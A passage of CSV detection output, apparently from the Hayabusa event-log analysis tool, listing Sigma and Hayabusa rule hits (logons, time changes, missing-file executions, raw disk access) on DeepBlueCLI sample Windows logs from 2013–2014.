Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 